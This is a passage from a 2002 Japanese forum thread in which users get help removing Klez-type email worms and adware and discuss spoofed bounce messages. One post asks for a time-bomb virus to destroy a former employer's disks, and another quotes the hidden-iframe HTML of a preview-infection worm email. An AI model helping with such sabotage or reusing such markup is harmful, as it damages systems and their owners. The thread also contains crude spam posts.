for <CZW6016@nifty.ne.jp>; Mon, 22 Apr 2002 20:45:35 +0900 (JST)
Received: from Qsoyz ([61.114.23.88]) by mta4p.ttcn.ne.jp with SMTP
id <20020422114509.FPPK683.mta4p@Qsoyz>
for <CZW6016@nifty.ne.jp>; Mon, 22 Apr 2002 20:45:09 +0900
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=AFZ3A47Cr658v9b7reK3aRB13R
Message-Id: <20020422114509.FPPK683.mta4p@Qsoyz>

----- Message body suppressed -----


582 :名無しさん@お腹いっぱい。:02/04/23 23:38
 578番さま>ありがとうございます。
      が。
      "プレビューウィンドウで表示する・・・"
      というのがないのですが・・。

       


583 :cheshire-cat:02/04/23 23:45
>>581
宛先不明とかで戻ってきたメルを装うvilliあったな、KLEZ.Eとか。

584 :名無しさん@お腹いっぱい。:02/04/23 23:51
>>582
長ったらしいので正確に書いてなかったけど、正しくは
 「プレビューウィンドウで表示するメッセージを自動的にダウンロードする」

バージョンによって違ったりするかも。ちなみにこっちは 6.00.2600.0000。
もしかしてアウトルックって、Outlook Express じゃなくて Outlook の事?

585 :名無しさん@お腹いっぱい。:02/04/23 23:53
>>581
From の偽装なんて難しいことではない。
自分が出した(様にみえる)メールがエラーで返ってきたら思わず開いちゃうでしょ?それが狙い。

586 :581:02/04/23 23:55
>583
ありがとう。
ちょっと上に書いてあったね。
一応、Trend Microのオンラインスキャンかけたんだけど、
何も無かったって事は、取り合えず他の人が感染してるってことだよね。

なりすましだと感染してる人を特定するのは無理かな?

587 :cheshire-cat:02/04/24 00:00
>>586
>感染してる人を特定するのは
こっちのスレで、ここ数日ヘッダから感染者特定できた人がいます。
http://pc.2ch.net/test/read.cgi/sec/1018248786/

>>585
漏れ先週、前日に自分が出したメルが戻ってきた。
一瞬ビクーリしたが、今ごろって考えると不思議だった。

588 : :02/04/24 00:05
ちくしょう、もうあんな会社やめてやる!
もともと悪どい商売やってたんで、忘れた頃にハードディスク
ぶっ壊してやりたいんですけど、アフォな俺でもしかけられる時限爆弾
のようなウィルスってありませんか。それか、全部winなんでコマンド
とかから、埋め込む方法あったら教えてホッスィ!どうか、オナガイしますぅ。
関連サイトでもいいです。まじでぶっ潰してやりたいんだよ。。


589 :>588:02/04/24 00:14
http://www.dogudoraku.com/ga/51n85-.html

590 :名無しさん@お腹いっぱい。:02/04/24 00:16
>>588
http://www.tools-site.net/s_bosh/d_hamdrill.htm

591 :名無しさん@お腹いっぱい。:02/04/24 00:19
>>588
漏れも参加。
http://home.att.ne.jp/sigma/rk/trans/makebomb.html

592 :591:02/04/24 00:21
馬鹿なリンクを紹介するだけなのも何なので、ついでに啓蒙活動。

 ZDNN-【知人を装うスパムにご用心】
 http://www.zdnet.co.jp/news/0204/15/e_spam.html

593 :名無しさん@お腹いっぱい。:02/04/24 08:02
jdbgmgr.exe これってウイルスですか?最近出てウイルスバスターとかノートンでもまだ
認識されてないってことらしいようなメールがきたんですが・・・

594 :591:02/04/24 09:04
>>593
http://www.google.com/search?num=50&hl=ja&q=%22jdbgmgr.exe%22&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

595 :インターネット=ソープランドのマンコ:02/04/24 13:25
ナマでパコパコやるな!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

ソープランドを貶める意図はありません。

このくらい言わないと重大さが解らないか?
ウイルス対策をしないのはチンコにゴムつけないのと同じです。

ソープランドで淋、蔵くらうことがあります。
別にスレがあります。

596 :名無しさん@お腹いっぱい。:02/04/24 14:01
W32/Elkern.Cってのが来たが、これはklez系の亜種
と考えてよいのか?
klez系を送ってきた別のメールとreturn-pathが一致しているのだが・・・

597 :名無しさん@お腹いっぱい。:02/04/24 14:18
>>596 http://www.symantec.com/region/jp/sarcj/data/w/w32.elkern.4926.html あたりか?

598 :名無しさん@お腹いっぱい。:02/04/24 17:03
onclick.exeという添付ファイルがついたメールがくるのですが、
ウイルスでしょうか?
サイズは123Kで、ヘッダの情報は
   Subject: To continue.
   To: 
   From:
   Date:
しかありません。

599 :お知恵をお貸しください:02/04/24 18:12
環境:Win98、ブラウザIE6

とあるファイル(拡張子ace)を解凍する為に韓国製の解凍ツールをインストールしたのですが
(下記症状が出るようになったので現在はアンインストール済です)
それ以来起動後、一番最初のブラウザ起動時に以下の症状が出るようになってしまいました。

[検索]ボタンが押された状態で全画面表示で起動するようになってしまいました
検索ウィンドウには「ttp://www.allcybersearch.com/xg-webplosion.htm」という見なれない検索ページが表示されています。
また、起動時に「ttp://www.webplosion.com/webplosionframe.php4?i=980&w=616&h=647&l=87&t=242&r=0」というウィンドウも勝手に開くようになってしまいました

上記ウィンドゥが開くだけではなく、起動ごとにグーグルツールバーも消えてしまうので、大変困っています解決するにはどうしたら良いでしょうか?


接続環境はADSLですので、エロサイト関係で云々という症状では無いはずです

『ツール>インターネットオプション>ホームページのアドレス』は
広告ソフトに有りがちな 「http:広告のアドレス=本来のHPアドレス」と、いうようなものではなく、HPのアドレスは正常なままです。

Windows板では下記ウィルスではないかとの診断を受けたのですが、ウィルス以外の可能性
もしウィルスである事が濃厚な場合、具体的な駆除方法等教えていただけないでしょうか? 
症状として、ブラウザ起動時に、スタートページについては改変されるという事はないようです

[JS/Seeker.gen]

このトロイの木馬は、Webブラウザが起動されると、
デフォルトのスタートページと検索ページを改変します。
ttp://www.nai.com/japan/virusinfo/virS2000.asp?v=JS/Seeker.gen


■自分でとった解決作(失敗の履歴)
韓国製の解凍ツールをアンインストール
ツール>設定のリセット
IE6の修復
トレンドマイクロ社のオンラインウィルス検索(ウィルス数ゼロの診断が出ました)

600 :cheshire-cat:02/04/24 18:45
>>599
それってJS/Seeker.genじゃなさそうなんだけど。

IEのプロパティ→LANの設定で、プロキシサーバーを使う設定になってる、とか。
ファイル名を指定→regedit→編集→検索→allcybersearchってやってみるとか。

でもAd-Aware使った方が早いような気がする。
まずは最初に、解凍ツール使った日に作成されたファイル、検索してみそ。

601 : :02/04/24 19:58
>>599
アドバイスは出来ないけど、少なくとも
>接続環境はADSLですので、エロサイト関係で云々という症状では無いはずです
この認識は間違ってると指摘できます。

スタートページの改ざんは、私も上のcheshire-catさんと同じく
レジストリを疑いますね。

602 :助けて下さい:02/04/24 20:33
 変なメールが届きました。
ただ、そのメールはどうもわたしが送ったものが
宛先不明で戻ってきたらしく…どうして良いかわかりません。
わたしが既にウイルスに感染しているということなのでしょうか??
詳しく状況を書きますのでアドバイスお願いします。m(_ _)m

差出人:postmaster <postmaster@so-net.ne.jp>
(わたしのプロバイダーがソネットで、こういうメールは
 メールアドレスを間違えて送ったときなどに
 かえって来るメールです)

The following mail can't be sent to nabi1@mail.gh:

From: わたしのアドレス
To: nabi1@mail.gh
Subject: questionnaire
The file is the original mail

添付ファイル:Dazqp.exe/“ふみえです”

 アドバイスお願いします。m(_ _)m

603 :お知恵をお貸しください:02/04/24 20:41
>600-601
Ad-Awareを実行したところそのものズバリのアドレスが出たため間違い無いようです

ありがとうございました

604 :cheshire-cat:02/04/24 20:42
>>602
戻ってきたメルを装っているだけだった、とか。
postmasterって、KLEZでよく見る。

「Dazqp.exe/“ふみえです”」って爆笑。ちょっと欲しいかも。

605 :cheshire-cat:02/04/24 20:44
>>603
該当の解凍ツールと、検出されたファイル名、何ですか?
参考までに教えて欲しいんだが。

そうるすと、以後被害者が出た時の対応がスムーズになるんだけど。

606 :名無しさん@お腹いっぱい。:02/04/24 20:44
>>602 W32.Klez.H@mm(WORM_KLEZ.G)でしょう。差出人のアドレスは、
感染先コンピュータ上で発見したメールアドレスからランダムに選択され
たものが使用されます。したがって、あなたのアドレスをアドレス帳に載
せている知人などがこのウィルスに感染して撒き散らしたメールがあて先
不明であなたのところへ戻されたものでしょう。
http://www.trendmicro.co.jp/klez/
念のためアンチウィルスソフトでスキャンすること。
持ってなければhttp://www.trendmicro.co.jp/hcall/index.aspで。

Klez系,Klez.Eスレッド
http://pc.2ch.net/test/read.cgi/sec/1018248786/l50

607 :助けて下さい602:02/04/24 21:13
 >>604,606

 レスありがとうございます。
とりあえずいまスキャンソフトダウンロードしています。
まだまだ不安ですが……(涙)

 あと、リンク先を読んでいたのですが、
「ファイルを開いたりプレビューすると感染します。」
とありました。
わたしはメールソフトはBeckyなのですが、
これは、IEのみの話ですか??
それともプレビューしてしまったのでわたしも感染している
ということになるのでしょうか……。

 教えて下さい。宜しくお願いしますm(_ _)m


608 :cheshire-cat:02/04/24 21:22
>>607
Becky使ってないからわからんけど、どうなんだろう。
漏れも知りたい。

それとIEはブラウザ。MSのメーラーはOEやOutlookなんだけど。
その他のメーラーでも、MAPI搭載してるのもあるから、必ずしもMS製品じゃなければ安心ってものでもないらしい。

ちなみにMAPIってMSが配ってるメーラー用のコンポーネントみたいなので、これを使えば簡単にメーラーが作れるってやつ。

609 :助けて下さい602:02/04/24 21:27
 すみません、IEはOutlookの間違いです。

なんかアンチウィルスソフトがダウンロードできません…。
強制終了とか、うんともすんとも言わなかったりとか。
不安……


610 :名無しさん@お腹いっぱい。:02/04/24 21:37
>>609
シマンテック
http://www.symantec.co.jp/region/jp/securitycheck/index.html
トレンドマイクロ
http://www.trendmicro.co.jp/hcall/index.asp

どっちもダメですか?

611 :cheshire-cat:02/04/24 21:37
>>609
ほれ、使え。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

これで駄目なら、他の手を考えようや。

612 :名無しさん@お腹いっぱい。:02/04/24 21:41
>>609
AntiVir ソフトはノートンやらバスターだけではない。
こんなのも選択肢にどうだぃ?
【無料AntiVirus AntiVirPE/AVG/Antidote簡易版】
http://pc.2ch.net/test/read.cgi/sec/1015584020/

613 :cheshire-cat:02/04/24 21:42
>>610
オンラインスキャンは仕組みが体験版とかと異なるから、有効かもな。

614 :助けて下さい602:02/04/24 21:56
>>610-613

 ありがとうございます。
今再起動して「トレンドマイクロ」のDLを試しています。
DL自体に凄い時間がかかっているので
どうなるのかわからないですけど…。
もうちょっと待ってみて駄目だったら別のを試してみます。
頑張ります。

615 :助けて下さい602:02/04/24 22:06
 やっとDL終了しました。
今スキャン中です。
どうなることやら…ドキドキ。

616 :名無しさん@お腹いっぱい。:02/04/24 22:27
>>615
スキャン中は他のプログラム走らせるのやめた方がいいと思うんだけど。

617 :名無しさん@お腹いっぱい。:02/04/24 22:30
>>615
スキャンするときは、全部のファイルをチェックするように設定してある?
そうでないなら、念のためそういう設定にしたほうが良いよ。


618 :助けて下さい602:02/04/24 22:55
 今スキャン終わりました。
やはり上記のメールはウイルスだったようです。

>ウイルス検索で感染ファイルが発見された場合、
>検出されたファイルのリストが表示されます。
>感染ファイルを削除するには、
>リストの中から削除したいファイルを選択して[削除ボタン]を
>クリックしてください。
>このオンラインスキャンではウイルスの「駆除」はおこなえません。
>駆除をおこなうには弊社製品ウイルスバスターをご利用ください。

 と紹介していただいたHP
http://www.trendmicro.co.jp/hcall/index.asp
に書いてあったのですが、
削除と駆除の違いが良くわかりません。

 とりあえず削除までは行いました。
この後すべきことを教えて下さい。
宜しくお願いしますm(_ _)m

619 :助けて下さい602:02/04/24 22:57
>>616

 あ…そうでしたね(汗)
IEのみ出しっぱなしでスキャンしてしまいました。
大丈夫でしょうか…?

>>617

 はい、大丈夫です。
ご心配ありがとうございます。

620 :名無しさん@お腹いっぱい。:02/04/24 23:06
>>619
>IEのみ出しっぱなしでスキャンしてしまいました。 大丈夫でしょうか…?
スキャンに余計な時間が掛かるくらいで、別に害があるわけではないと思う。


621 :cheshire-cat:02/04/24 23:07
>>618
2ch重い、広告腹立つ。プロキシミトロン導入するか。

ウイルスAが感染したとする。
ファイルBにAを突っ込む→駆除可能。
Aが単独で存在→アンチウイルスソフトでは駆除できず、削除するしかない。
後者は駆除のしようがないから。
なおそこは、駆除はできずに削除のみ可能なサービス。

結局さ、検出名は何?

622 :名無しさん@お腹いっぱい。:02/04/24 23:08
>>618
削除と駆除の違いは

・削除 - 文字どおり、感染しているファイルをHDから消し去ること。
・駆除 - 感染しているファイルから、ウィルスを取り除いてファイルを修復すること。

削除だと元ファイル(ウィルスに取り憑かれたファイル)ごと無くなってしまうけど、
駆除なら元ファイルは無事に無菌状態になる。

623 :名無しさん@お腹いっぱい。:02/04/24 23:09
>>618
削除と駆除の違い

削除:ウイルスが単独のファイルの場合、又は、ファイル感染型で
ファイルを破壊せずにウイルス部分だけ取り除くのが困難な場合
ファイルごと削除。

駆除:ファイルに感染したウイルスを、ファイルのデータを温存
したままウイルス部分だけ削除。

みたいな感じだったと思います。


624 :623:02/04/24 23:10
(予想したとおりかぶりまくりますた)

625 :622:02/04/24 23:12
さて、漏れとケコーンしたいのは >>621>>623 のどっちだ?

626 :cheshire-cat:02/04/24 23:17
>>620
重くてリロードできず、まともに利用できない状態なんで、よそ逝ってくる。

612の人が書いたAntidote簡易版、やってみそ。件出力は高いから。
喰らったら複数のアンチウイルスソフトでチェック、これ基本。

627 :名無しさん@お腹いっぱい。:02/04/24 23:18
つか、駆除って成功した例がない。

628 :名無しさん@お腹いっぱい。:02/04/24 23:19
>>626
かちゅーしゃ使ってないの?

629 :助けて下さい602:02/04/24 23:20
>>620

 そうですか、ほっとしました。
確かに大変時間はかかりましたが(^^;

>>621-624

 成る程、わかりました。
ということは、これでパソは安全な状態になった、と
考えて良いのでしょうか。

なお、検出されたのはご指摘のとおりKLEZ でした。

 あと、もうひとつだけ。
今回の場合、結局わたしは「感染」したことになるのでしょうか??
「感染」したのだとしたら、またわたしのアドレス帳にある
メールアドレスからどこかへウイルスが撒き散らされたということに
なりますよね。
それに対して何か対策ってたてたほうが良いのでしょうか…??

630 :cheshire-cat:02/04/24 23:21
3人カブリって、初めて体験。

631 :助けて下さい602:02/04/24 23:25
>>626

 わかりました、やってみます。

632 :名無しさん@お腹いっぱい。:02/04/24 23:28
>>629
HDからウィルスが全部消えたのなら問題なし。
というか、今後感染しないように注意することが重要。

・無闇に添付ファイル開くな
・既知のアドレスからのメールだからと言って安心するな
・ちゃんとウィルススキャンソフト買って常駐させろ(アップデートも最低週一回する)
・シマンテックとかのサイトにこまめに目を通してウィルスの情報を収集する
・2ch で無闇にリンクをクリックするな


633 :cheshire-cat:02/04/24 23:32
>>628
よーわからん出所のものは使わないっす。
というか漏れ、常用しているアンチウイルスソフトとかPFWとかルーターとかブラウザ、書いたことないっしょ、一度も。

>>629
アドレス帳の相手、全滅かもしれん。
まあアドレス帳に限らずローカルなファイルからメアド抽出するし。
例えばパソに元々入っていたツールのhtml形式ヘルプ、とかも。

知らんふり、って手も。って嘘です。
検出されたのがメーラーのメールボックスとか添付ファイルを別個に保存しる所なら、問題ないです。
Systemフォルダからゴミが見つかったなら、感染してたかも。
メル送信ログは残さないらしいんで、誰に送ったかは後からはわからんっすね。

634 :助けて下さい602:02/04/24 23:56
>>632
>・無闇に添付ファイル開くな

 これは大丈夫です。基本的に開かない主義にしているので…
ただ、プレビュー(Outlook以外ですが)してしまったのでそれが心配で(^^;;

>・既知のアドレスからのメールだからと言って安心するな
>・ちゃんとウィルススキャンソフト買って常駐させろ(アップデートも最低週一回する)
>・シマンテックとかのサイトにこまめに目を通してウィルスの情報を収集する

 すみません、これは油断してました。
これからは気をつけます。

>・2ch で無闇にリンクをクリックするな

 これも大丈夫です(笑)
こんなにたくさんクリックしたのは今日が初めてです。(笑)

>>633

>検出されたのがメーラーのメールボックスとか添付ファイルを別個に
>保存しる所なら、問題ないです。
>Systemフォルダからゴミが見つかったなら、感染してたかも。

 メールボックスから検出されました。
ということは問題なし=「感染していない」
=他の人にウイルス送って迷惑かけてたりしてない、というふうに
理解して良いのでしょうか??

 なんか違ってたらご指摘お願い致します…m(_ _)m

メル送信ログは残さないらしいんで、誰に送ったかは後からはわからんっすね。



635 :名無しさん@お腹いっぱい。:02/04/25 00:39
>>634
>>623が何を言いたいのかっていうと、
メーラーのメールボックスで見つかったと言うことは、逆に言うと
メーラー内部でウィルスの行動が止まったっていうこと。
で、メーラーで止まった分についてはスキャンしたら見つかって
削除したわけだから(感染する前に削除できたので)心配なしって
言うこと。

で、これが systemフォルダ(C:\windows\system)とかで見つかって
しまった場合だと、ウィルスの進行をメーラーの段階で食い止められ
ずに Windows ごと感染してしまった後だと言うこと。その場合は危険
というか手遅れ。

今回の場合は対応が良かったので感染はしなかったと思う。

636 :635:02/04/25 00:40
・・・と言うことだよね。cheshire-cat さん。
違ってたら怒って。

637 :名無しさん@お腹いっぱい。:02/04/25 00:49
>>608
亀レスだけど、Becky!のHTMLメール表示機能はIEコンポーネント
を利用しているので、OEと同じ脆弱性があると思っていい。勿論
OEと違ってプレビュー即感染なんて馬鹿な作りにはなってないけど、
開いちまえば終わり。
それと、MAPI使用のメーラーだと、確かユードラもMAPIだったハズ。

638 :ジン:02/04/25 01:21
くだらねぇ質問はここに書き込め Ver2.15にも記入させていただいたのですが、
我が家のPCから(電源を切っていたのに)勝手に自分の携帯にこんなメールが届きました。


件名:A very funny game
本文:?:Invalid Message Text


こんな現象は初めてなので困っています。誰かこれに関する情報をお持ちの方はいませんか?

639 :名無しさん@お腹いっぱい。:02/04/25 01:26
>>638
ttp://oreoka.kir.jp/nandemoari/img-box/img20020422224236.png

640 :名無しさん@お腹いっぱい。:02/04/25 01:33
>638
たぶん、あなたのPCで使ってるメールアドレスと
携帯のメールアドレスの両方知ってる人が犯人。
心当たりがいたら、ウイルスチェックさせれ。

641 :ジン:02/04/25 01:34
639さん、情報ありがとうございます。


642 :ジン:02/04/25 01:35
640さん、ありがとうございます。

643 :名無しさん@お腹いっぱい。:02/04/25 01:46
>>637
あのぅ、EdMaxはどうなんでしょうか?
(((( ;゚Д゚)))ガクガクブルブル

644 :ジン:02/04/25 02:07
たびたびすいません。
【Klez.e】や【Kiez.h】のウイルスは、携帯のメールからPCに感染という事はありますか?

645 :助けて下さい602:02/04/25 02:40
 現在612さんに教えていただいたソフトでスキャンしなおしています。
…が、終わりません(^^;
このまま朝になってしまいそうです…。

>>635

 なるほど、多分わかりました。
じゃあ一安心かな…と思っていたのですが、
ここでなんか「アレ?」と思うことが。
さっき1回目にスキャンしたとき、
確かにメールボックスからウイルスとして検出されたものを
削除したはずなのですが、
今メールソフトを一瞬起動してみてみたら、
そのメール+添付ファイルがそのまま残っていて…(汗)
これって、OKなのですか??
何かの手違いで削除ができなかったのでしょうか。。。

>>637

 ではBeckyも安全ではないのですね。。。
どのソフトなら結構安心、みたいなのってないのでしょうか??

646 :名無しさん@お腹いっぱい。:02/04/25 03:22
>>644
ファイルが添付できて、メールサイズが制限されなければ、
送られたPCで感染することはある。
当然だが、携帯が感染してPCに送るということはない。

>>645
beckey!はbase-64エンコードをそのままテキスト保存したような気もする。
ので、テキストエディタでメールボックスを開き、
base-64エンコードされたところを削除する方法もある、かも。

電八。1メール⇔1ファイル、ウィルス付きメールを
受け取っても他のメールもろとも心中することはない。
ただ、デフォルトの使い勝手は極めて悪い。

647 :助けて下さい602:02/04/25 03:57
 2回目のスキャン(Antidote簡易版で)がようやく終了しました。
…またウイルスが検出されました…(汗)
でも、検出された場所は、どうやら先ほどと同じ
メールソフトの中のようです。
さっき削除したはずなのに、どうしてなのでしょう。

 あと、Antidote簡易版でのウイルスの削除方法が
わかりません。
どなたかまだ起きてらっしゃる方いらっしゃいませんか??
もしいらしたら教えて下さいませm(_ _)m
(自分でももう1度探してはみますが…)。


648 :cheshire-cat:02/04/25 07:14
>>636
そのとおりっす。
>>637
ってことは、直接本文に書き込まれた危険htmlメルはドボン、っすか。
1ヶ月試用無料だったよね、実験するかな〜

>>647
Antidote簡易版は、ウイルスの削除も駆除もできないっす。
なぜ薦めたかって言うと、これは最新のウイルスを一番よく検出できる、ってことで。
他にも何か感染しているんじゃないかなって思ったからっす。
メーラー開いて、プレビューとかしない状態で該当メルを直接削除して、ゴミ箱に残っているのも削除でどうっしょ。

649 :ジン:02/04/25 07:51
646さん、ありがとうございます。

650 :名無しさん@お腹いっぱい。:02/04/25 08:56
inet@microsoft.comからW32.Klez.gen@mm来たやついる?

651 :名無しさん@お腹いっぱい。:02/04/25 09:44
WORM系のウイルスの主な破壊行動を具体的に教えて。
ちなみにWORM_KLEZ.Gです。

652 :名無しさん@お腹いっぱい。:02/04/25 09:46
>650
W32.Klez.gen@mmの送付元は偽装されていると思われ。
メールのヘッダ見ればわかるよ。

653 :650:02/04/25 09:58
>>652
ありがと、たしかに、怪しそうな所を経由している。

654 :助けて下さい602:02/04/25 13:06
>>648

 ありがとうございます。
えと、今削除しました。
あと、もう1度スキャンしてみたら
また同じ場所からウイルス検出されてどうしようかと思いましたが、
さらに削除して再度スキャンしたら検出されなくなったので
これで今度こそ大丈夫…でしょうか。
どうも大変お世話になりました、ありがとうございましたm(_ _)m

 で、今後事前にこういう事態を防ぐ手段を
宜しければ教えて下さい。
(どのウイルススキャンソフトを使えば良いか、など…)
頼りきりで申し訳有りませんがどうぞ宜しくお願いします。m(_ _)m

655 :名無しさん@お腹いっぱい。:02/04/25 13:19
ノートンアンチウィルス2002
http://www.symantec.com/region/jp/products/nav/index.html
ウィルスバスター2002
http://www.trendmicro.co.jp/product/vb2002/index.asp
あたりが一般的。すぐにでも買うことをお勧めする。

656 :名無しさん@お腹いっぱい。:02/04/25 13:49
メールもそんなに来ないし、今までウィルス来たこともない、OEから
Edmaxに乗り換えた。こんな自分でもアンチウィルスソフト必要ですか?
もし導入しても重くなるとおもうので常駐させたくないんですが。

657 :名無しさん@お腹いっぱい。:02/04/25 13:50
>656
自己責任

658 :656:02/04/25 14:04
自己責任ですか。ふーむ。

659 :名無しさん@お腹いっぱい。:02/04/25 14:15
あんまり車に乗らないし、今まで事故に遭ったこともないし
任意保険は必要ないですよね? というヤシと同じかと。
すべては自己責任。

660 :名無しさん@お腹いっぱい。:02/04/25 14:43
W32.Klez.gen@mm というウイルスに感染してる事がわかったのですが駆除の仕方がわかりません。
色々なウィルス駆除のページも見たんですがパソコン初心者なんで専門用語があったりするとそこで行き詰まってしまうんです。
なるべく簡単に駆除出来る方法など知っている方いましたら教えて下さい!

661 :名無しさん@お腹いっぱい。:02/04/25 14:50
>>660
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
http://www.trendmicro.co.jp/klez/tool.asp
上記じゃダメなのか? 書いてある通りにやるだけなんだが…

662 :名無しさん@お腹いっぱい。:02/04/25 14:52
>>660
とりあえず見れ。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G

663 :656は淋蔵まみれ!!!!!!!!!!!!!!!:02/04/25 15:43
ナマでパコパコやるな!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

ソープランドを貶める意図はありません。

このくらい言わないと重大さが解らないか?
ウイルス対策をしないのはチンコにゴムつけないのと同じです。

ソープランドで淋、蔵くらうことがあります。
別にスレがあります。

664 :名無しさん@お腹いっぱい。:02/04/25 17:55
>>663 つまんねーんだよ。例え話にも知性が現れるって事がわかんねーんだろうな。

665 :名無しさん@お腹いっぱい。:02/04/25 18:45
>>664 相手すんな

666 :名無しさん@お腹いっぱい。:02/04/25 18:58
>>656
( ゚Д゚)ハァ?

667 : :02/04/25 20:49
>>664
つまんねーんだよ。
つまんねーんだよ。
つまんねーんだよ。
つまんねーんだよ。
つまんねーんだよ。

>>665
( ゚Д゚)ハァ?
( ゚Д゚)ハァ?
( ゚Д゚)ハァ?
( ゚Д゚)ハァ?
( ゚Д゚)ハァ?


668 :名無しさん@お腹いっぱい。:02/04/25 20:51
22日から毎日、1日1通
時間は決まって夜8時〜10時ぐらいの間
差出人は知らない相手で毎回変わる
添付ファイルは無い

中身は毎度おんなじで、cid;の先の文字列のみ変わる

<HTML><HEAD></HEAD><xbody>
<xiframe src=cid:I563qb971568gCL height=0 width=0>
</iframe>
<FONT></FONT></BODY></HTML>

しかしIFRAMEの中のcid;に相当する添付ファイルは無い。

件名は

月曜 Gazou.jpg
火曜 How are you
水曜 (C) 2002 Yahoo Japan Corporation. All Rights
木曜 Gazou.jpg

なんでしょ、コレ?

669 :名無しさん@お腹いっぱい。:02/04/25 21:19


670 :名無しさん@お腹いっぱい。:02/04/25 21:21
トレンドマイクロのオンラインウイルス検索を実行して
ひっかかってなければ感染してないと思って良いですか?
あまりにウイルスが来るので心配なんです。
ちなみにAVG入れてます。
とても厨な質問ですみません。

671 :名無しさん@お腹いっぱい。:02/04/25 22:00
トロイの木馬ってかかるとどうなりますか?


672 :671:02/04/25 22:01
ついでに駆除方法教えてください。

673 :名無しさん@お腹いっぱい。:02/04/25 22:14
>>670
さすがにオリジナルのウイルスや未対応のウイルスは検出できません。
でも、そんなウイルスに引っかかる前に自分でも防御意識を高めておきましょう。
セキュリティーホールは埋めるなどは、簡単にできますので。

>>671-672
外部からパソコンを操れるようになる、個人情報が勝手に漏れてしまうなど。
駆除はウイルス対策ソフトなどありますが、再インストールが1番かもしれません。

674 :名無しさん@お腹いっぱい。:02/04/25 22:15
>>670
オンラインのウイルススキャンでは、圧縮ファイルが
スキャン対象外だったり、実行中のシステムファイルは
スキャンできなかったりしたと思うけど。

AVGが最新版なら、最近のウイルスには対応できてると思うけど。

675 :671:02/04/25 22:24
>>673
ありがとうございました〜。

676 :名無しさん@お腹いっぱい。:02/04/25 22:32
ノートンのアンチウィルス更新したらメール受信出来なくなりました。
ネットにはつながるのにどうしてでしょうか?
設定は変えてないです。XPです。

677 :名無しさん@お腹いっぱい。:02/04/25 22:33
>>668
うちも今日それと似たようなの来ました。
件名のみで、添付ファイルなし。
ソース見ると同じようなことが書いてあります。
特に問題ないと思って良い?

678 :名無しさん@お腹いっぱい。:02/04/25 22:45
>>668
><iframe src=cid:I563qb971568gCL height=0 width=0>

Previewするだけで感染するタイプのウィルス添付メールの特徴です。

679 :名無しさん@お腹いっぱい。:02/04/25 22:52
すみません、激しく板違いかも知れませんが、友人のauの携帯電話が、ウィルスに
やられてしまったようなのです。
携帯電話対象のウィルスに詳しい方、もしいらしたら、教えていただけないでしょうか?
携帯電話の板にも行ってみたのですが、ウィルス情報を探せなかったのです・・・。


680 :名無しさん@お腹いっぱい。:02/04/25 23:00
>>679
何故ウィルスだと思ってるんだろうね(w

681 :679:02/04/25 23:09


登録アドレスが消えて「ヌヌ ヌヌ」って書かれていたり、
>送信メールとメモが全部消えたり、
>設定が変更になって、
>たとえば小さい文字表示が大きい文字表示になったり、
>引用符設定のところ
>「>」が「ヌヌ ヌヌ」とあまりみかけない漢字になったり、
>親しい人しか受信できない設定なのに
>登録していない人から受信できて
>登録している人が着信拒否になったり、
>電源を切ろうとしたら切れずに「しばらくお待ちください」になったり
>(電池パックを抜いた)。
>夫に返信でメールを送ったら
>件名「ヌヌ」で届いて本文が動き出したので慌てて削除したんだって。

682 :670:02/04/25 23:09
AVGは最新にしてますし、セキュリティーホールは埋めてます。
ただ今までBadtranceでもそうなんですが、こんなにウイルスが来た事がないので
ちょっと不安になってしまったんです。
すでにKlezだけで30通以上。Nimdaでさえ4通しか来なかったのに。
だから自分の自己防衛が完璧か?というのも自信もないので不安で.....鬱だ
また勉強の旅に逝ってきます。

683 :679=681です。:02/04/25 23:14
うわー、やっちゃった!あわててたので、ごめんなさい!
>>681は、友人が訴えてきた症状なのです。

その他にも、次のような症状を訴えてきました。

>送信履歴がメールも電話も消えちゃうの。
>引用符設定編集しようとすると画面が暗くなって切り替わる。
>昨夜とうとう電話もメールも受けつけなくなったようです。

これは、ウィルスに感染したのではないでしょうか?

684 :助けて下さい602:02/04/25 23:17
>>655

 ありがとうございます。
大学の生協で売ってたら明日にでも、できるだけはやく買いますね。

 昨日から今日にかけてcheshire-catさんをはじめ
たくさんの方にお世話になりました。
助けて下さった方々、本当にありがとうございましたm(_ _)m
これからは自衛にもきちんと気を配ります。

685 :do:02/04/25 23:34
Norton Internet Security 2002 V4 Retail
Norton Internet Security 2002

は同じモノですか?購入するなら上の方ですか・・・


686 :名無しさん@お腹いっぱい。:02/04/26 01:08
>>643
EdMaxもHTMLメールのレンダリングにはIEエンジンを使ってる。
ので、危険度はOEと同じ。
つか、HTML表示できるメーラーで、レンダリングエンジンにIE以外の
もの使ってるのって netscape mail 位だと思う。和製のシェアウェア
メーラーに独自のレンダリングエンジンを期待するほうが無茶。

687 :名無しさん@お腹いっぱい。:02/04/26 01:33
a special funny game
というタイトルのメールをあけてもいいですか?

バスターが反応するか見てみたい。

688 :名無しさん@お腹いっぱい。:02/04/26 01:38
>>687
お願いだから、回線切ってからやってね。

689 :教えてください:02/04/26 02:08
私、今yuji1121@jcom.home.ne.jpのアドレスを持つ方からウィルス付きのメールを送られています。一日に何度も来ます!メールは初心者で何も解りません。誰か助けてください。
知り合いに詳しい人もいません。どうしたら良いのかウィルスについてくわしい方教えてください。
